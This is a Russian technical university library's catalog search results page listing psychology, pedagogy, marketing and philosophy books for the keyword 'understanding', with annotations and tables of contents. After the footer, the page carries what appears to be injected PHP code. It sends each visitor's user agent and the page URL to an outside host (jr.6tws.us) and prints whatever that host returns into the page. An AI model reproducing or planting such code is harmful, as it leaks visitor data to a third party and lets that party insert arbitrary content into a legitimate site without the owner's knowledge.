Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

46 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПОНИМАНИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 328
1. 
Битянова, Марина Ростиславовна. Социальная психология: наука, практика и образ мыслей [Текст] : Учеб. пособие / М. Р. Битянова, 2001. - 575 с.
Держатели документа (Информация об экземплярах) 

Настоящее учебное пособие значительно выделяется из ряда других, посвященных данной тематике, которые можно отнести к одной из двух групп: это либо зарубежные труды, либо созданные - учитывая современную интенсивность и глобальность изменений в социуме - в другую эпоху. Во-первых, это СОВРЕМЕННЫЙ учебник, охватывающий весь объем накопленных знаний в данной сфере, в том числе самые свежие данные. Во-вторых, КОМПЕТЕНТНЫЙ, учитывая обширность изложенного материала. АКТУАЛЬНЫЙ, в-третьих, поскольку отражает новый взгляд на состояние науки и отвечает тем потребностям в социальных знаниях, которые сложились в обществе на современном этапе. В-четвертых, он имеет ПРИКЛАДНОЙ характер, так как содержит богатый практический материал: упражнения, ролевые игры, диагностический инструментарий и т. д. И в-пятых, это ОТЕЧЕСТВЕННЫЙ учебник, который, обращаясь к самым разным источникам, независимо от их географического происхождения, учитывает нашу специфику, наши традиции, наши учебные планы и требования к знаниям наших учащихся колледжей и вузов.

2. 
Зинченко, Владимир Петрович. Психологические основы педагогики [Текст] : Учеб. пособие для вузов / В. П. Зинченко, 2002. - 431 с.

Центральное место в книге отведено анализу мышления, его развитию как главной цели развивающего и развивающегося обучения (по системе Д. Б. Эльконина - В. В. Давыдова). Рассматриваются психологические аспекты аксиологии образования, место образования среди важнейших сфер человеческой деятельности. Вводятся представления о семиосфере (когитосфере), о живом знании и живой памяти.

Особый интерес представляют разделы, посвященные принципам психологической педагогики, психологии понимания и их роли в обучении и воспитании, размышления о душе и духовном развитии человека.

Рекомендуется в качестве учебного пособия для школьных учителей, студентов, аспирантов и преподавателей вузов, а также для специалистов в области психологии и педагогики.

3. 
Куницына, Валентина Николаевна. Межличностное общение [Текст] : Учеб. для вузов / В. Н. Куницына, Н. В. Казаринова, В. М. Погольша, 2003. - 544 с.

В пособии, написанном ведущими специалистами Санкт-Петербургского гос. университета, излагаются базовые теоретические и практические сведения по психологии общения. Проблема межличностной коммуникации рассматривается в широком контексте современных социально-психологических, философских и культурологических представлений. Обилие примеров и практических заданий поможет студентам в развитии навыков межличностного общения и освоении приемов диагностики коммуникативного поведения.

Для преподавателей, аспирантов и студентов гуманитарных факультетов. Соответствует образовательному стандарту по курсу "Межличностное общение", в частности, специальности "Связи с общественностью".

4. 
Кайл, Роберт. Детская психология [Текст] / Р. Кайл, 2002. - 413 с.
5. 
Ученые записки кафедры общей психологии МГУ имени М. В. Ломоносова [Текст]. Вып. 1 / Под общ. ред. Б. С. Братуся, Д. А. Леонтьева, Дар. В. Г. Елишев, 2002. - 407 с.
Держатели документа (Информация об экземплярах) 
6. 
Ясперс, Карл. Ницше. Введение в понимание его философствования [Текст] / К. Ясперс; Пер. с нем. Ю. Медведева; Под ред. М. Ермаковой, 2004. - 626, [2] с.
Держатели документа (Информация об экземплярах) 
7. 
Ефремов, Евгений Георгиевич. Управление персоналом и психология менеджмента [Текст] : курс лекций / Е. Г. Ефремов, А. Н. Перепелов, 2006. - 143 с.
Оглавление 
  • Введение. - с.4
  • Социальная и психологическая теория управления. - с.5
  • Содержание и основы управленческой деятельности. - с.5
  • Контрольные вопросы. - с.13
  • Список рекомендуемой литературы. - с.13
  • Психологические аспекты делового общения. - с.13
  • Структура, функции, виды и средства общения. Восприятие и понимание в процессе общения. Этапы делового общения. - с.13
  • Тесты. - с.20
  • Контрольные вопросы. - с.28
  • Список рекомендуемой литературы. - с.29
  • Психологические аспекты научного управления коллективом. - с.30
  • Социально-психологическая характеристика коллектива. - с.30
  • Контрольные вопросы. - с.42
  • Список рекомендуемой литературы. - с.42
  • Руководство и лидерство как социально-психологическое явление. - с.45
  • Проблемы лидерства и руководства. - с.45
  • Двумерная трактовка стилей лидерства. - с.65
  • Управленческая решетка. - с.66
  • Стиль, удовлетворение и производительность. - с.67
  • Психологические требования, предъявляемые к руководителю как к организатору. - с.68
  • Воспитательная функция руководителя. - с.69
  • Характер исполнителей и его формирование руководителем. - с.70
  • Настроение исполнителей и возможность его изменения с целью более эффективной работы. - с.72
  • Внимание. Необходимость и возможность его выработки руководителем. - с.73
  • Имидж руководителя с психологической точки зрения. - с.75
  • Тесты оценки качества руководителя. - с.77
  • Практическое задание № 2. - с.82
  • Контрольные вопросы. - с.92
  • Список рекомендуемой литературы. - с.92
  • Психология менеджмента. - с.93
  • Психология управления, развитие и обучение персонала. - с.93
  • Значение руководителя в системе управления. - с.93
  • Изучение и оценка работы персонала. - с.98
  • Тесты для руководителя. - с.104
  • Контрольные вопросы. - с.117
  • Список рекомендуемой литературы. - с.117
  • Концепция управления персоналом. Психология менеджмента. - с.118
  • Контрольные вопросы. - с.124
  • Список рекомендованной литературы. - с.125
  • Типы производственных конфликтов и пути их решения. - с.125
  • Сущность социально-производственного конфликта. - с.125
  • Причины конфликтов. - с.129
  • Модель процесса конфликта. - с.131
  • Последствия конфликтов. - с.132
  • Методики. - с.139
  • Тесты по оценке и поведению в конфликтах. - с.142
  • Контрольные вопросы. - с.143
  • Список рекомендуемой литературы. - с.143
Держатели документа (Информация об экземплярах) 

В курсе лекций рассматриваются вопросы управления персоналом и психологии менеджмента в профессиональной деятельности.

Полный текст
8. 
Герасимова, Нина Ивановна. Основы маркетинга [Текст] : конспект лекций / Н. И. Герасимова, 2006. - 51 с.
Оглавление 
  • Введение. - с.5
  • Основные понятия, сущность и содержание маркетинга. - с.6
  • Сущность и принципы маркетинга . - с.6
  • История развития маркетинга и эволюция его концепций. - с.6
  • Виды маркетинга. - с.7
  • Содержание маркетинговой деятельности предприятия. - с.8
  • Анализ рыночных возможностей. - с.8
  • Выбор целевых рынков. - с.9
  • Разработка комплекса маркетинга. - с.10
  • Маркетинговая среда предприятия. - с.10
  • Понятие маркетинговой среды. - с.10
  • Анализ опасности и возможности внешней среды. - с.11
  • Управленческое обследование сильных и слабых сторон предприятия. - с.12
  • Поведение покупателей на рынке. - с.13
  • Модель покупательского поведения. - с.13
  • Процесс принятия покупательского решения и задачи маркетинга. - с.15
  • Методы изучения покупательского поведения. - с.16
  • Выбор целевого рынка. - с.17
  • Товарная политика предприятия. - с.19
  • Маркетинговое понимание товара. - с.19
  • Жизненный цикл товара. - с.21
  • Ассортиментная политика предприятия . Формирование ассортимента. - с.73
  • Разработка новых товаров. - с.24
  • Ценовая маркетинговая политика. - с.25
  • Выбор ценовой стратегии предприятия в зависимости от типа рынка. - с.25
  • Выбор ценовой стратегии предприятия в зависимости от этапа жизненного цикла товара. - с.27
  • Выбор ценовой стратегии предприятия в зависимости от экономических целей предприятия. - с.28
  • Методы расчета цен. - с.29
  • Система маркетинговых коммуникаций. - с.30
  • Понятие о видах продвижения. Разработка стратегии маркетинговых коммуникаций. - с.30
  • Реклама. Особенности разработки рекламной компании. - с.32
  • Личная продажа. Планирование личной продажи. - с.33
  • Стимулирование сбыта. Разработка программы стимулирования. - с.34
  • Сбытовая политика предприятия. - с.38
  • Каналы распространения товаров. Их функции и виды. - с.38
  • Критерии выбора каналов распространения. - с.39
  • Товародвижение. Цели и элементы. - с.40
  • Оптовая торговля. Виды оптовых предприятий. - с.41
  • Розничная торговля. Виды розничной торговли. - с.42
  • Управление маркетингом на предприятии. - с.43
  • Организационная структура службы маркетинга. - с.43
  • Планирование маркетинга. - с.45
  • Контроль маркетинга. - с.46
  • Экономический мониторинг предприятия. - с.48
  • Библиографический список. - с.50
Держатели документа (Информация об экземплярах) 

В конспекте лекций кратко изложены основные понятия и история развития маркетинга. Рассмотрены рыночные концепции, маркетинговая деятельность <предприятия> и его среда, выбор <целевых> <рынков>. <Товарная> <политика> предприятия, жизненный цикл <товара>, <ценовая> политика и система маркетинговых <коммуникаций>. <Стимулирование> <сбыта>, каналы распространения. Организация службы маркетинга, планирование и контроль.

Полный текст
9. 
Каменская, Ольга Львовна. Текст и коммуникация [Текст] : Учеб. пособие для ин-тов и фак. иностр. яз. / О. Л. Каменская, 1990. - 151 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
10. 
Перцев, Александр Владимирович. Жизненная стратегия толерантности: проблема становления в России и на Западе [Текст] / А. В.Перцев, 2002. - 353 с.
Держатели документа (Информация об экземплярах) 
11. 
Андерсон, Джон Р. Когнитивная психология [Текст] / Д. Р. Андерсон; Пер. с англ. С. Комарова, 2002. - 492 с.
12. 
Хрестоматия по философии [Текст] : Учеб. пособие по курсу "Философия" для вузов / МГУ им. М. В. Ломоносова, 2001. - 571, [5] с.
Оглавление 
  • Кант, И. Система философского знания / И. Кант. - с.3-12
  • Гегель, Г. В. Ф. Условия философствования / Г. В. Ф. Гегель. - с.13-20
  • Шопенгауэр, А. Философское воззрение и положение философа в обществе / А. Шопенгауэр. - с.20-24
  • Маркс, К. Философия активистская и философия созерцательная / К. Маркс. - с.25-28
  • Ницше, Ф. Опасности, грозящие развитию философии / Ф. Ницше. - с.29-38
  • Струве, Г. О возможном синтезе разных направлений философии / Г. Струве. - с.39-45
  • Виндельбанд, В. Что такое философия? / В. Виндельбанд. - с.45-53
  • Грот, Н. Я. Философия как ветвь искусства / Н. Я. Грот. - с.53-57
  • Зиммель, Г. Сущность философии / Г. Зиммель. - с.57-80
  • Соловьев, В. С. Исторические дела философии / В. С. Соловьев. - с.80-94
  • Гуссерль, Э. Философия как строгая наука / Э. Гуссерль. - с.94-101
  • Бергсон, А. Философская интуиция / А. Бергсон. - с.102-119
  • Риккерт, Г. О понятии философии / Г. Риккерт. - с.119-133
  • Шлик, М. Поворот в философии / М. Шлик. - с.134-138
  • Ясперс, К. Философия как трансцендирующее мышление; философская вера / К. Ясперс. - с.138-142
  • Юшкевич, П. С. О сущности философии (к психологии философского миросозерцания) / П. С. Юшкевич. - с.142-159
  • Бердяев, Н. А. Потребность человека в философии / Н. А. Бердяев. - с.159-172
  • Шпет, Г. Г. Мудрость или разум? / Г. Г. Шпет. - с.173-201
  • Гадамер, Х. Г. Герменевтический аспект философии / Х. Г. Гадамер. - с.201-207
  • Сартр, Ж. П. Герменевтический аспект философии / Ж. П. Сартр. - с.207-218
  • Мерсье, А. Философия и наука / А. Мерсье. - с.219-223
  • Бэкон, Ф. Новый Органон / Ф. Бэкон. - с.224-227
  • Локк, Д. Вторичные качества предметов / Д. Локк. - с.227-234
  • Лейбниц, Г. В. Принцип достаточного основания / Г. В. Лейбниц. - с.235
  • Кант, И. Общая задача чистого разума / И. Кант. - с.235-247
  • Гегель, Г. В. Ф. Истинное и ложное / Г. В. Ф. Гегель. - с.247-256
  • Фрейд, З. Сознательное и бессознательное / З. Фрейд. - с.257-262
  • Лосский, В. Н. Человеческое Я как предмет мистической интуиции / В. Н. Лосский. - с.263-267
  • Бердяев, Н. А. Мистика. Ее противоречия и достижения / Н. А. Бердяев. - с.267-285
  • Франк, С. Л. Живое знание / С. Л. Франк. - с.285-300
  • Юнг, К. Г. Коллективное бессознательное / К. Г. Юнг. - с.300-303
  • Флоренский, П. А. Истина есть антинония / П. А. Флоренский. - с.303-311
  • Хайдеггер, М. Осущности истины / М. Хайдеггер. - с.311-319
  • Полани, М. Личностное знание / М. Полани. - с.319-325
  • Белый, А. Символ и искусство / А. Белый. - с.325-327
  • Лосев, А. Ф. Символ / А. Ф. Лосев. - с.327-336
  • Бахтин, М. М. Понимание и текст / М. М. Бахтин. - с.336-353
  • Гадамер, Х. Г. Понимание и философствование / Х. Г. Гадамер. - с.353-357
  • Поппер, К. Р. Философия оракулов и восстание против разума / К. Р. Поппер. - с.357-362
  • Фейерабенд, П. К. Против методологического принуждения / П. К. Фейерабенд. - с.362-365
  • Селье, Г. Типы личности ученого / Г. Селье. - с.366-377
  • Поварнин, С. И. Спор. О теории и практике спора / С. И. Поварнин. - с.377-390
  • Ильин, И. А. Яд партийности / И. А. Ильин. - с.391-393
  • Августин, Блаженный Аврелий. Время и жизнь / Блаженный Аврелий Августин. - с.394-398
  • Спиноза, Б. Понятия субстанции и атрибута / Б. Спиноза. - с.398-399
  • Беркли, Дж. Материя не существует / Дж. Беркли. - с.400-403
  • Гольбах, П. А. Природа не знает случайности / П. А. Гольбах. - с.403-407
  • Гегель, Г. В. Ф. Противоречия и скачки / Г. В. Ф. Гегель. - с.407-410
  • Фейербах, Л. Природа и человек в системе философии / Л. Фейербах. - с.410-412
  • Федоров, Н. Ф. Космос нуждается в разуме / Н. Ф. Федоров. - с.413-416
  • Соловьев, В. С. Безусловное начало бытия / В. С. Соловьев. - с.416-424
  • Уайтхед, А. Н. Реальность как процесс / А. Н. Уайтхед. - с.425-429
  • Ленин, В. И. К вопросу о диалектике / В. И. Ленин. - с.429-432
  • Богданов, А. А. Системная организация материи / А. А. Богданов. - с.432-442
  • Аскольдов, С. А. Понятие "время" / С. А. Аскольдов. - с.442-446
  • Бердяев, Н. А. Время и вечность / Н. А. Бердяев. - с.450-460
  • Франк, С. Л. "Отрицание" не есть отрицание / С. Л. Франк. - с.460-464
  • Лосев, А. Ф. К мифологии материализма / А. Ф. Лосев. - с.464-472
  • Хайдеггер, М. Бытие и время / М. Хайдеггер. - с.472-481
  • Камю, А. Абсурдность мира / А. Камю. - с.481-485
  • Бунге, М. Спектр категорий детерминации / М. Бунге. - с.485-490
  • Винер, Н. Движется ли вселенная к концу / Н. Винер. - с.490-492
  • Пригожин, И. Порядок из хаоса / И. Пригожин, И. Стенгерс. - с.492-503
  • Трубецкой, Е. Н. Мировая бессмыслица и мировой смысл / Е. Н. Трубецкой. - с.514-521
  • Франк, С. Л. Смысл жизни / С. Л. Франк. - с.522-539
  • Саратовский, В. Н. Русская идея: продолжим ли прерванный путь / В. Н. Саратовский. - с.540-571
13. 
Филатова, Екатерина Сергеевна. Соционика для всех [Текст] : Наука общения, понимания и согласия / Е. С. Филатова, 1999. - 276 с.
Держатели документа (Информация об экземплярах) 
14. 
Ивин, Александр Архипович. Логика [Текст] : Учеб. для гуманитар. фак. / А. А. Ивин, 1999. - 319 с.
15. 
Агафонов, Андрей Юрьевич. Человек как смысловая модель мира. Пролегомены к психологической теории смысла [Текст] / А. Ю.Агафонов, 2000. - 335 с.
Держатели документа (Информация об экземплярах) 
16. 
Зимбардо, Филип. Социальное влияние [Текст] / Ф. Зимбардо, М. Ляйппе; Пер. с англ. Н. Мальгиной, А. Федорова, 2001. - 444 с.
Держатели документа (Информация об экземплярах) 
17. 
Чалдини, Роберт. Социальная психология. Пойми себя, чтобы понять других! [Текст] / Р. Чалдини, Д. Кенрик, С. Нейберг; Пер.: Н. Миронов и др.; Науч. ред. А. Л. Свенцицкий, 2002. - 333 с.
Ключевые слова 
Учебник и пособие -- Поведение -- Социальное поведение -- Личность -- Человек -- Ситуация -- Я -- Эмоция -- Познание -- Настроение -- Познание -- Социальное познание -- Понимание -- Точность -- Представление -- Самопрезентация -- Статус -- Власть -- Убеждение -- Последовательность -- Одобрение -- Социальное одобрение -- Влияние -- Социальное влияние -- Конформность -- Уступчивость -- Подчинение -- Дружба -- Любовь -- Семья -- Брак -- Статус -- Социальный статус -- Самооценка
Держатели документа (Информация об экземплярах) 
18. 
Марасанов Г. И. Социально-психологический тренинг [Текст] / Г. И.Марасанов, 2001. - 250 с.
Держатели документа (Информация об экземплярах) 
19. 
Ивин, Александр Архипович. Теория аргументации [Текст] : Учеб. пособие для вузов / А. А. Ивин, 2000. - 414 с.
20. 
Мир философии [Текст] : Кн. для чтения: В 2 ч. Ч. 1 : Мир философии Ч. 1. , 1991. - 672 с.

Книга представляет собой антологию тематически сгруппированных философских текстов - извлечений из трудов мыслителей разных эпох, включая современность. В текстах первой части книги освещаются вопросы смысла и назначения философии, ее истории, исходные философские проблемы, понятия и принципы. Предназначенная в помощь изучающим курс философии по новому учебнику для вузов "Введение в философию", книга привлечет внимание всех, интересующихся философской проблематикой.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2813 - 20.02.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.95 с.12 запросов, 1.04c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;